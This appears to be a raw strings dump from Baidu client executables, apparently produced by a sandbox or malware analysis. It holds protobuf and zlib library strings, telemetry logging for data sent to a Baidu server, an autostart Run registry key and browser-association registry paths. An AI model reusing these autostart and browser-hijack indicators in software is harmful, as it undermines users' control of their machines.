.?AV?$singleton_wrapper@V?$extended_type_info_typeid@USHostLoginNotification@CommonServiceMsg@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@USHostDoReport@CommonServiceMsg@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@USHostDoReport@CommonServiceMsg@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@USHostLoginNotification@CommonServiceMsg@@@serialization@boost@@@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@USHostLoginNotification@CommonServiceMsg@@@serialization@boost@@@serialization@boost@@
.?AV?$extended_type_info_typeid@USHostLoginNotification@CommonServiceMsg@@@serialization@boost@@
.?AV?$extended_type_info_typeid@USHostLoginNotification@CommonServiceMsg@@@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@USHostDoReport@CommonServiceMsg@@@serialization@boost@@@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@USHostDoReport@CommonServiceMsg@@@serialization@boost@@@serialization@boost@@
.?AV?$extended_type_info_typeid@USHostDoReport@CommonServiceMsg@@@serialization@boost@@
.?AV?$extended_type_info_typeid@USHostDoReport@CommonServiceMsg@@@serialization@boost@@
.?AV?$singleton_wrapper@V?$iserializer@Vbinary_iarchive@archive@boost@@USHostLoginNotification@CommonServiceMsg@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$singleton_wrapper@V?$iserializer@Vbinary_iarchive@archive@boost@@USHostLoginNotification@CommonServiceMsg@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$singleton_wrapper@V?$iserializer@Vbinary_iarchive@archive@boost@@USHostDoReport@CommonServiceMsg@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$singleton_wrapper@V?$iserializer@Vbinary_iarchive@archive@boost@@USHostDoReport@CommonServiceMsg@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$iserializer@Vbinary_iarchive@archive@boost@@USHostLoginNotification@CommonServiceMsg@@@detail@archive@boost@@
.?AV?$iserializer@Vbinary_iarchive@archive@boost@@USHostLoginNotification@CommonServiceMsg@@@detail@archive@boost@@
.?AV?$iserializer@Vbinary_iarchive@archive@boost@@USHostDoReport@CommonServiceMsg@@@detail@archive@boost@@
.?AV?$iserializer@Vbinary_iarchive@archive@boost@@USHostDoReport@CommonServiceMsg@@@detail@archive@boost@@
.?AV?$bind_t@XV?$mf1@XVCCommonWorkerProcess@@ABUSIPCMsg@IPCMessager@Base@@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VCCommonWorkerProcess@@@boost@@@_bi@boost@@V?$value@USIPCMsg@IPCMessager@Base@@@23@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf1@XVCCommonWorkerProcess@@ABUSIPCMsg@IPCMessager@Base@@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VCCommonWorkerProcess@@@boost@@@_bi@boost@@V?$value@USIPCMsg@IPCMessager@Base@@@23@@_bi@3@@_bi@boost@@
.?AUSHostDoReport@CommonServiceMsg@@
.?AUSHostDoReport@CommonServiceMsg@@
.?AUSHostLoginNotification@CommonServiceMsg@@
.?AUSHostLoginNotification@CommonServiceMsg@@
%uuqb
%uuqb
?"?4?;?|?
?"?4?;?|?
;%;*;2;{;
;%;*;2;{;
5T5C5R5a5p5
5T5C5R5a5p5
= =$=(=,=0=4=8=
= =$=(=,=0=4=8=
9 9@9`9|9
9 9@9`9|9
3 3$3(3,30343
3 3$3(3,30343
A8706990-9490-4106-8033-12E64714B86B
A8706990-9490-4106-8033-12E64714B86B
Protocol.dll
Protocol.dll
CHROMECORE_PROCESS
CHROMECORE_PROCESS
\WebkitEngine.dll
\WebkitEngine.dll
\TridentEngine.dll
\TridentEngine.dll
chrome-extension
chrome-extension
login
login
url-safe
url-safe
res://LocalPages.dll/
res://LocalPages.dll/
.html
.html
.br.baidu.com
.br.baidu.com
.bdl.brs
.bdl.brs
--default-chromecore-path=
--default-chromecore-path=
--disable-chromecore
--disable-chromecore
Reply msg to parent
Reply msg to parent
Start hearbeat and send heartbeat msg.
Start hearbeat and send heartbeat msg.
password
password
C1BB4C06-D91C-47D8-B28E-E76B943205E9
C1BB4C06-D91C-47D8-B28E-E76B943205E9
user32.dll
user32.dll
\LogicMisc.dll
\LogicMisc.dll
\UIHandler.dll
\UIHandler.dll
Upd.dat
Upd.dat
BaiduUpdate.exe
BaiduUpdate.exe
\BrowserFrame.dll
\BrowserFrame.dll
\Heartbeat.dll
\Heartbeat.dll
%ws\Utils.dll
%ws\Utils.dll
%ws\Base.dll
%ws\Base.dll
Leave PrefetchData:readFile error code=%d
Leave PrefetchData:readFile error code=%d
Enter Base::MemoryOptimizer::Instance().Start()
Enter Base::MemoryOptimizer::Instance().Start()
Leave Base::MemoryOptimizer::Instance().Start()
Leave Base::MemoryOptimizer::Instance().Start()
Baidu.exe
Baidu.exe
@\CommonWorker.dll
@\CommonWorker.dll
Failed in init CommonWorker.dll instance.
Failed in init CommonWorker.dll instance.
pCCommonWorkerProcess::Run installationTask = %s
pCCommonWorkerProcess::Run installationTask = %s
CCommonWorkerProcess::Run customid = %d shmoffset = %d
CCommonWorkerProcess::Run customid = %d shmoffset = %d
CCommonWorkerProcess::HandleInstallationTask() strTaskType=%s strTaskParam=%s
CCommonWorkerProcess::HandleInstallationTask() strTaskType=%s strTaskParam=%s
BaiduBugRpt.exe
BaiduBugRpt.exe
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
uninst.exe
uninst.exe
HandleSCNotifyTask ItemID = %d shmoffset = %d
HandleSCNotifyTask ItemID = %d shmoffset = %d
HandleSCNotifyTask wszSrcFileName = %s
HandleSCNotifyTask wszSrcFileName = %s
HandleSCNotifyTask monitorid = %d
HandleSCNotifyTask monitorid = %d
HandleSCNotifyTask eventType = %d
HandleSCNotifyTask eventType = %d
ShellExecute result = %d
ShellExecute result = %d
sBDClientProxy.dll
sBDClientProxy.dll
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
ClientRegAddValueToList result = %d
ClientRegAddValueToList result = %d
nClientRegSetValueEx result = %d
nClientRegSetValueEx result = %d
GetDefenseSwitch value = %s
GetDefenseSwitch value = %s
GetDefenseSwitch Read Reg failed! err = %d
GetDefenseSwitch Read Reg failed! err = %d
\PluginMgr.dll
\PluginMgr.dll
p\BrowserCore.dll
p\BrowserCore.dll
1.6.200.359
1.6.200.359
CheckerExe.exe_2864:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
t6;.u%Sj
t6;.u%Sj
aSSSh
aSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
tGHt.Ht&
tGHt.Ht&
t.Wh,
t.Wh,
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
.mixcrt
.mixcrt
KERNEL32.DLL
KERNEL32.DLL
mscoree.dll
mscoree.dll
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
kernel32.dll
kernel32.dll
portuguese-brazilian
portuguese-brazilian
..\src\google\protobuf\message_lite.cc
..\src\google\protobuf\message_lite.cc
CHECK failed: !coded_out.HadError():
CHECK failed: !coded_out.HadError():
libprotobuf %s %s:%d] %s
libprotobuf %s %s:%d] %s
%d.%d.%d
%d.%d.%d
..\src\google\protobuf\stubs\common.cc
..\src\google\protobuf\stubs\common.cc
..\src\google\protobuf\io\coded_stream.cc
..\src\google\protobuf\io\coded_stream.cc
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
CHECK failed: (from.GetDescriptor()) == (descriptor):
CHECK failed: (from.GetDescriptor()) == (descriptor):
..\src\google\protobuf\message.cc
..\src\google\protobuf\message.cc
: Tried to copy from a message with a different type.to:
: Tried to copy from a message with a different type.to:
..\src\google\protobuf\descriptor.cc
..\src\google\protobuf\descriptor.cc
". To use it here, please add the necessary import.
". To use it here, please add the necessary import.
", which is not imported by "
", which is not imported by "
.PLACEHOLDER_VALUE
.PLACEHOLDER_VALUE
.placeholder.proto
.placeholder.proto
map key must name a scalar or string field.
map key must name a scalar or string field.
map_key must not name a repeated field.
map_key must not name a repeated field.
$0$1 = $2
$0$1 = $2
.dummy
.dummy
FieldDescriptorProto.extendee set for non-extension field.
FieldDescriptorProto.extendee set for non-extension field.
FieldDescriptorProto.extendee not set for extension field.
FieldDescriptorProto.extendee not set for extension field.
Files that do not use optimize_for = LITE_RUNTIME cannot import files which do use this option. This file is not lite, but it imports "
Files that do not use optimize_for = LITE_RUNTIME cannot import files which do use this option. This file is not lite, but it imports "
$0$1 $2 $3 = $4
$0$1 $2 $3 = $4
CHECK failed: dynamic.get() != NULL:
CHECK failed: dynamic.get() != NULL:
.foo = value".
.foo = value".
CHECK failed: !out.HadError():
CHECK failed: !out.HadError():
" is repeated. Repeated options are not supported.
" is repeated. Repeated options are not supported.
Import "
Import "
Missing field: FileDescriptorProto.name.
Missing field: FileDescriptorProto.name.
File recursively imports itself:
File recursively imports itself:
..\src\google\protobuf\wire_format.cc
..\src\google\protobuf\wire_format.cc
..\src\google\protobuf\reflection_ops.cc
..\src\google\protobuf\reflection_ops.cc
..\src\google\protobuf\generated_message_reflection.cc
..\src\google\protobuf\generated_message_reflection.cc
\xx
\xx
..\src\google\protobuf\stubs\strutil.cc
..\src\google\protobuf\stubs\strutil.cc
?..\src\google\protobuf\descriptor.pb.cc
?..\src\google\protobuf\descriptor.pb.cc
google/protobuf/descriptor.proto
google/protobuf/descriptor.proto
google/protobuf/descriptor.proto
google/protobuf/descriptor.proto
google.protobuf"G
google.protobuf"G
2$.google.protobuf.FileDescriptorProto"
2$.google.protobuf.FileDescriptorProto"
2 .google.protobuf.DescriptorProto
2 .google.protobuf.DescriptorProto
2$.google.protobuf.EnumDescriptorProto
2$.google.protobuf.EnumDescriptorProto
2'.google.protobuf.ServiceDescriptorProto
2'.google.protobuf.ServiceDescriptorProto
2%.google.protobuf.FieldDescriptorProto
2%.google.protobuf.FieldDescriptorProto
.google.protobuf.FileOptions
.google.protobuf.FileOptions
.google.protobuf.SourceCodeInfo"
.google.protobuf.SourceCodeInfo"
2/.google.protobuf.DescriptorProto.ExtensionRange
2/.google.protobuf.DescriptorProto.ExtensionRange
.google.protobuf.MessageOptions
.google.protobuf.MessageOptions
2 .google.protobuf.FieldDescriptorProto.Label
2 .google.protobuf.FieldDescriptorProto.Label
2*.google.protobuf.FieldDescriptorProto.Type
2*.google.protobuf.FieldDescriptorProto.Type
.google.protobuf.FieldOptions"
.google.protobuf.FieldOptions"
2).google.protobuf.EnumValueDescriptorProto
2).google.protobuf.EnumValueDescriptorProto
.google.protobuf.EnumOptions"l
.google.protobuf.EnumOptions"l
2!.google.protobuf.EnumValueOptions"
2!.google.protobuf.EnumValueOptions"
2&.google.protobuf.MethodDescriptorProto
2&.google.protobuf.MethodDescriptorProto
.google.protobuf.ServiceOptions"
.google.protobuf.ServiceOptions"
.google.protobuf.MethodOptions"
.google.protobuf.MethodOptions"
2).google.protobuf.FileOptions.OptimizeMode:
2).google.protobuf.FileOptions.OptimizeMode:
2$.google.protobuf.UninterpretedOption":
2$.google.protobuf.UninterpretedOption":
2$.google.protobuf.UninterpretedOption*
2$.google.protobuf.UninterpretedOption*
2#.google.protobuf.FieldOptions.CType:
2#.google.protobuf.FieldOptions.CType:
experimental_map_key
experimental_map_key
2$.google.protobuf.UninterpretedOption"/
2$.google.protobuf.UninterpretedOption"/
2-.google.protobuf.UninterpretedOption.NamePart
2-.google.protobuf.UninterpretedOption.NamePart
2(.google.protobuf.SourceCodeInfo.Location
2(.google.protobuf.SourceCodeInfo.Location
com.google.protobufB
com.google.protobufB
Tokenizer::ParseInteger() passed text that could not have been tokenized as an integer:
Tokenizer::ParseInteger() passed text that could not have been tokenized as an integer:
..\src\google\protobuf\io\tokenizer.cc
..\src\google\protobuf\io\tokenizer.cc
Tokenizer::ParseFloat() passed text that could not have been tokenized as a float:
Tokenizer::ParseFloat() passed text that could not have been tokenized as a float:
Tokenizer::ParseStringAppend() passed text that could not have been tokenized as a string:
Tokenizer::ParseStringAppend() passed text that could not have been tokenized as a string:
..\src\google\protobuf\dynamic_message.cc
..\src\google\protobuf\dynamic_message.cc
..\src\google\protobuf\text_format.cc
..\src\google\protobuf\text_format.cc
..\src\google\protobuf\stubs\substitute.cc
..\src\google\protobuf\stubs\substitute.cc
..\src\google\protobuf\descriptor_database.cc
..\src\google\protobuf\descriptor_database.cc
Invalid file descriptor data passed to EncodedDescriptorDatabase::Add().
Invalid file descriptor data passed to EncodedDescriptorDatabase::Add().
..\src\google\protobuf\extension_set.cc
..\src\google\protobuf\extension_set.cc
CHECK failed: iter != extensions_.end():
CHECK failed: iter != extensions_.end():
..\src\google\protobuf\extension_set_heavy.cc
..\src\google\protobuf\extension_set_heavy.cc
inflate 1.2.5 Copyright 1995-2010 Mark Adler
inflate 1.2.5 Copyright 1995-2010 Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
1.2.5
CustomId: %u, %ls: %d, %u
CustomId: %u, %ls: %d, %u
- unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
- unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
.\main.cpp
.\main.cpp
CustomId: %u, %ls, %ls
CustomId: %u, %ls, %ls
D:\bdzc\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
D:\bdzc\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
asio.misc
asio.misc
asio.misc error
asio.misc error
Report::CReportData::PackToProtoDataItem
Report::CReportData::PackToProtoDataItem
.\ReportMgr.cpp
.\ReportMgr.cpp
val(%s):
val(%s):
Report::CReportData::PackReportData
Report::CReportData::PackReportData
..\..\Include\msg.pb.cc
..\..\Include\msg.pb.cc
datapkg.FieldsList
datapkg.FieldsList
datapkg.DataType
datapkg.DataType
datapkg.ResPonse
datapkg.ResPonse
DataReport --- Server Disable Report !!
DataReport --- Server Disable Report !!
Report::CReportClient::CanReport
Report::CReportClient::CanReport
.\ReportClient.cpp
.\ReportClient.cpp
DataReport --- ReportID %u Banned !!
DataReport --- ReportID %u Banned !!
DataReport --- AsyncReport : Not Allowed !!
DataReport --- AsyncReport : Not Allowed !!
Report::CReportClient::AsyncReport
Report::CReportClient::AsyncReport
DataReport --- AsyncReport : AddPacketToQueue cmdid=%u length=%u
DataReport --- AsyncReport : AddPacketToQueue cmdid=%u length=%u
DataReport --- AsyncReport : End
DataReport --- AsyncReport : End
DataReport --- SyncReport : Not Allowed !!
DataReport --- SyncReport : Not Allowed !!
Report::CReportClient::SyncReport
Report::CReportClient::SyncReport
DataReport --- SyncReport : begin
DataReport --- SyncReport : begin
DataReport --- SyncReport : CreateEvent
DataReport --- SyncReport : CreateEvent
DataReport --- SyncReport : AddPacketToQueue cmdid=%u length=%u
DataReport --- SyncReport : AddPacketToQueue cmdid=%u length=%u
DataReport --- SyncReport : WaitForSingleObject wait=%u
DataReport --- SyncReport : WaitForSingleObject wait=%u
DataReport --- SyncReport : WaitForSingleObject result=%d
DataReport --- SyncReport : WaitForSingleObject result=%d
DataReport --- SyncReport : End
DataReport --- SyncReport : End
DataReport::AddPacketToQueue
DataReport::AddPacketToQueue
.\PacketQueue.cpp
.\PacketQueue.cpp
DataReport::AddPacketToQueue %u records
DataReport::AddPacketToQueue %u records
Report::TransportMgr::TransportMgr
Report::TransportMgr::TransportMgr
.\TransportMgr.cpp
.\TransportMgr.cpp
DataReport::StopTransportThread 1, uiWaitTime=%u
DataReport::StopTransportThread 1, uiWaitTime=%u
Report::TransportMgr::StopTransportThread
Report::TransportMgr::StopTransportThread
DataReport::StopTransportThread 2
DataReport::StopTransportThread 2
TransportMgr::OnResponse errorcode = %d
TransportMgr::OnResponse errorcode = %d
Report::TransportMgr::OnResponse
Report::TransportMgr::OnResponse
Report::TransportMgr::LoadPacketData
Report::TransportMgr::LoadPacketData
DataReport::LoadPacketData Change file success, new filesize = %u
DataReport::LoadPacketData Change file success, new filesize = %u
DataReport::LoadPacketData Change file failed! Clear file
DataReport::LoadPacketData Change file failed! Clear file
DataReport::LoadPacketData Clear file
DataReport::LoadPacketData Clear file
DataReport::SaveAndErasePacket cache file is full!
DataReport::SaveAndErasePacket cache file is full!
Report::TransportMgr::SaveAndErasePacket
Report::TransportMgr::SaveAndErasePacket
DataReport::SaveAndErasePacket save %d records
DataReport::SaveAndErasePacket save %d records
Report::TransportMgr::SaveAndEraseQueuePacket
Report::TransportMgr::SaveAndEraseQueuePacket
DataReport::SaveAndEraseQueuePacket save %d records
DataReport::SaveAndEraseQueuePacket save %d records
DataReport::start!
DataReport::start!
Report::TransportMgr::Working
Report::TransportMgr::Working
DataReport::TransportPacket success
DataReport::TransportPacket success
DataReport::TransportPacket failed[%d], buffer is full, try save [%u] records to file!
DataReport::TransportPacket failed[%d], buffer is full, try save [%u] records to file!
DataReport::TransportPacket failed[%d], save it to buffer! buffer size = %u
DataReport::TransportPacket failed[%d], save it to buffer! buffer size = %u
DataReport::TransportPacket failed becouse of server error, we abandon it!
DataReport::TransportPacket failed becouse of server error, we abandon it!
DataReport::TransportPacket Deal Cache !!
DataReport::TransportPacket Deal Cache !!
DataReport::TransportPacket DealCacheLimit=%u LastCacheNum=%u NewCacheNum=%u
DataReport::TransportPacket DealCacheLimit=%u LastCacheNum=%u NewCacheNum=%u
DataReport::TransportPacket Decrease Limit !! DealCacheLimit=%u
DataReport::TransportPacket Decrease Limit !! DealCacheLimit=%u
DataReport::TransportPacket Increase Limit !! DealCacheLimit=%u
DataReport::TransportPacket Increase Limit !! DealCacheLimit=%u
DataReport::TransportPacket buffer size = %u
DataReport::TransportPacket buffer size = %u
DataReport::TransportPacket Load [%u] buffer Packet to Queue!
DataReport::TransportPacket Load [%u] buffer Packet to Queue!
DataReport::stop!
DataReport::stop!
DataReport::TransportPacket Begin!
DataReport::TransportPacket Begin!
Report::TransportMgr::TransportPacket
Report::TransportMgr::TransportPacket
DataReport::TransportPacket SendPacket error = %d tryCount = %d
DataReport::TransportPacket SendPacket error = %d tryCount = %d
DataReport::SendPacket Error: %d, Wait %u seconds, then try again
DataReport::SendPacket Error: %d, Wait %u seconds, then try again
DataReport::SendPacket Error: %d, MAX_TRY_COUNT return
DataReport::SendPacket Error: %d, MAX_TRY_COUNT return
DataReport::SendPacket Connect error: lost %u ms, sleep 10 s!
DataReport::SendPacket Connect error: lost %u ms, sleep 10 s!
Report::TransportMgr::SendPacket
Report::TransportMgr::SendPacket
DataReport::SendPacket success: use %u ms!
DataReport::SendPacket success: use %u ms!
DataReport::SendPacket Get Svr Response: use %u ms! errcode = %u
DataReport::SendPacket Get Svr Response: use %u ms! errcode = %u
HandleResponse Static response cnt = %d MsgType = %d errorCode = %d
HandleResponse Static response cnt = %d MsgType = %d errorCode = %d
Report::CReportResponseHandler::HandleResponse
Report::CReportResponseHandler::HandleResponse
.\ReportNetComm.cpp
.\ReportNetComm.cpp
Report::CReportNetComm::CReportNetComm
Report::CReportNetComm::CReportNetComm
hXXp://dr.zc.baidu.com
hXXp://dr.zc.baidu.com
CBDMReportNetComm::RpcRequestData CmdID=%u Length=%u
CBDMReportNetComm::RpcRequestData CmdID=%u Length=%u
Report::CReportNetComm::RpcRequestData
Report::CReportNetComm::RpcRequestData
CBDMReportNetComm::RpcRequestData Fail !!
CBDMReportNetComm::RpcRequestData Fail !!
Basic_Report
Basic_Report
Basic_BugReport
Basic_BugReport
(%d/%d)%d-d-d_d:d:d.d_%s %s_%s:%s
(%d/%d)%d-d-d_d:d:d.d_%s %s_%s:%s
(%d) d:d:d.d %s %s_%s: %s
(%d) d:d:d.d %s %s_%s: %s
{7AFAC7CE-6A89-4385-8861-5075F44ECC7F}
{7AFAC7CE-6A89-4385-8861-5075F44ECC7F}
.\Config\Config.cpp
.\Config\Config.cpp
.\Config\CompoundDoc\CompoundDoc.cpp
.\Config\CompoundDoc\CompoundDoc.cpp
SetCrypt service_id=%d url=%s
SetCrypt service_id=%d url=%s
SetServiceUrl
SetServiceUrl
.\src\Protocol\AuroraServiceImpl.cpp
.\src\Protocol\AuroraServiceImpl.cpp
InitProductParam ver=%s soft_id=%d supply_id=%d product_id=%d
InitProductParam ver=%s soft_id=%d supply_id=%d product_id=%d
.\src\Protocol\AuroraProtocol.cpp
.\src\Protocol\AuroraProtocol.cpp
1234567890111111
1234567890111111
bena::protocol::ProtobufPack::UpdateSoftParam
bena::protocol::ProtobufPack::UpdateSoftParam
\NetService.ini
\NetService.ini
ServiceUrl.%d
ServiceUrl.%d
D:\bdzc\stable_proj\include\thirdInclude\boost/property_tree/ini_parser.hpp
D:\bdzc\stable_proj\include\thirdInclude\boost/property_tree/ini_parser.hpp
key expected
key expected
duplicate key name
duplicate key name
D:\bdzc\stable_proj\include\thirdInclude\boost/property_tree/string_path.hpp
D:\bdzc\stable_proj\include\thirdInclude\boost/property_tree/string_path.hpp
thread.entry_event
thread.entry_event
thread.exit_event
thread.exit_event
.\src\Protocol\RpcClient.cpp
.\src\Protocol\RpcClient.cpp
boost thread: trying joining itself
boost thread: trying joining itself
header.proto
header.proto
.\bena\Protocol\proto\header.pb.cc
.\bena\Protocol\proto\header.pb.cc
header.proto"
header.proto"
127.0.0.1
127.0.0.1
bena::http::client::do_async_request
bena::http::client::do_async_request
D:\bdzc\BasicModule\Source\Protocol\bena/http/client.h
D:\bdzc\BasicModule\Source\Protocol\bena/http/client.h
bena::http::client::~client
bena::http::client::~client
.\src\http\client.cpp
.\src\http\client.cpp
bena::http::client::close_for_destruct
bena::http::client::close_for_destruct
bena::http::client::close
bena::http::client::close
bena::http::client::async_connect_coro
bena::http::client::async_connect_coro
async_connect_coro connect error !! error: %s
async_connect_coro connect error !! error: %s
bena::http::client::async_request_coro
bena::http::client::async_request_coro
bena::http::client::hanle_timeout
bena::http::client::hanle_timeout
error_happened error: %s
error_happened error: %s
bena::http::client::error_happened
bena::http::client::error_happened
Unsupported Media Type
Unsupported Media Type
HTTP Version not supported
HTTP Version not supported
HTTP/1.0
HTTP/1.0
HTTP/1.1
HTTP/1.1
https
https
ftpes
ftpes
ftps
ftps
tftp
tftp
% ;?:@=&,$/-_!.~*()
% ;?:@=&,$/-_!.~*()
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
%s\Connection
d:\bdzc\Basic\outputmt\binreleasemt\CheckerExe.pdb
d:\bdzc\Basic\outputmt\binreleasemt\CheckerExe.pdb
KERNEL32.dll
KERNEL32.dll
RegEnumKeyExW
RegEnumKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ADVAPI32.dll
ADVAPI32.dll
WS2_32.dll
WS2_32.dll
WTSAPI32.dll
WTSAPI32.dll
SHLWAPI.dll
SHLWAPI.dll
PSAPI.DLL
PSAPI.DLL
WINMM.dll
WINMM.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
CreateIoCompletionPort
CreateIoCompletionPort
USER32.dll
USER32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
NETAPI32.dll
NETAPI32.dll
GetConsoleOutputCP
GetConsoleOutputCP
GetWindowsDirectoryW
GetWindowsDirectoryW
GetSystemWindowsDirectoryW
GetSystemWindowsDirectoryW
RegCreateKeyExW
RegCreateKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegOpenKeyExA
RegOpenKeyExA
zcÁ
zcÁ
.?AV?$Singleton@VCReportMgr@Report@@$00@@
.?AV?$Singleton@VCReportMgr@Report@@$00@@
.?AVCReportMgr@Report@@
.?AVCReportMgr@Report@@
.?AVCReportData@Report@@
.?AVCReportData@Report@@
.?AVIReportMgr@Report@@
.?AVIReportMgr@Report@@
.?AVIReportData@Report@@
.?AVIReportData@Report@@
.?AV?$sp_counted_impl_p@VTransportMgr@Report@@@detail@boost@@
.?AV?$sp_counted_impl_p@VTransportMgr@Report@@@detail@boost@@
.?AVCReportClient@Report@@
.?AVCReportClient@Report@@
.?AV?$Thread@U?$BindMember0@VTransportMgr@Report@@P812@AEXPAX@Z@fund@@@fund@@
.?AV?$Thread@U?$BindMember0@VTransportMgr@Report@@P812@AEXPAX@Z@fund@@@fund@@
.?AV?$EnableIntrusive@VCReportResponseHandler@Report@@@@
.?AV?$EnableIntrusive@VCReportResponseHandler@Report@@@@
.?AVCReportResponseHandler@Report@@
.?AVCReportResponseHandler@Report@@
.?AVCReportNetComm@Report@@
.?AVCReportNetComm@Report@@
.?AV?$enable_shared_from_this@Vclient@http@bena@@@boost@@
.?AV?$enable_shared_from_this@Vclient@http@bena@@@boost@@
.?AVclient@http@bena@@
.?AVclient@http@bena@@
.?AVrequest@http@bena@@
.?AVrequest@http@bena@@
.?AVheader@http@bena@@
.?AVheader@http@bena@@
.?AV?$bind_t@XV?$mf5@XVRpcClient@protocol@bena@@ABVresponse@http@3@Vconst_buffer@asio@boost@@IVerror_code@system@8@H@_mfi@boost@@V?$list6@V?$value@V?$shared_ptr@VRpcClient@protocol@bena@@@boost@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@U?$arg@$02@3@U?$arg@$03@3@V?$value@H@23@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf5@XVRpcClient@protocol@bena@@ABVresponse@http@3@Vconst_buffer@asio@boost@@IVerror_code@system@8@H@_mfi@boost@@V?$list6@V?$value@V?$shared_ptr@VRpcClient@protocol@bena@@@boost@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@U?$arg@$02@3@U?$arg@$03@3@V?$value@H@23@@_bi@3@@_bi@boost@@
.?AV?$service_base@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AV?$service_base@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AV?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@
.?AV?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@
.?AV?$service_base@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$service_base@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@
.?AV?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@
.?AV?$sp_counted_impl_p@V?$vector@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@V?$allocator@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@@std@@@std@@@detail@boost@@
.?AV?$sp_counted_impl_p@V?$vector@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@V?$allocator@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@@std@@@std@@@detail@boost@@
.?AV?$typeid_wrapper@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AV?$typeid_wrapper@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AV?$typeid_wrapper@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$typeid_wrapper@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AVresponse@http@bena@@
.?AVresponse@http@bena@@
1,2r2
1,2r2
42696@6_6
42696@6_6
7*8084888
7*8084888
? ?$?(?,?0?4?~?
? ?$?(?,?0?4?~?
1 1$1(1,1
1 1$1(1,1
1 2
8 8$8(8,8084888
8%9x9
8 8$8(8,808
Firefox
Opera
Chrome
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
http\shell\open\command
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
explorer.exe
subkey(%d):
pkey(%d):
val(%d):
a
@CanReport
BanReportID
TransportMgr create
rpt.dat
TransportMgr CacheFileName=%s
DataReport::LoadPacketData Read %s failed, error=%u!
DataReport::LoadPacketData Read %s success, but the file is empty!
DataReport::LoadPacketData Read %s success, filesize = %u
DataReport::LoadPacketData Read %s success, get %d records!
pCReportNetComm create
uGlobal\{17ED6DA0-0902-461c-B763-F00FF209066B}Global\{FA6FBBB1-8C8E-43b1-B8EC-35573A94C231}Global\{599D3D74-AA1A-4473-A004-B724A8018505}t%d.dat
bbservice.exe
UtilsDll.dll
%u.%u.%u.%u
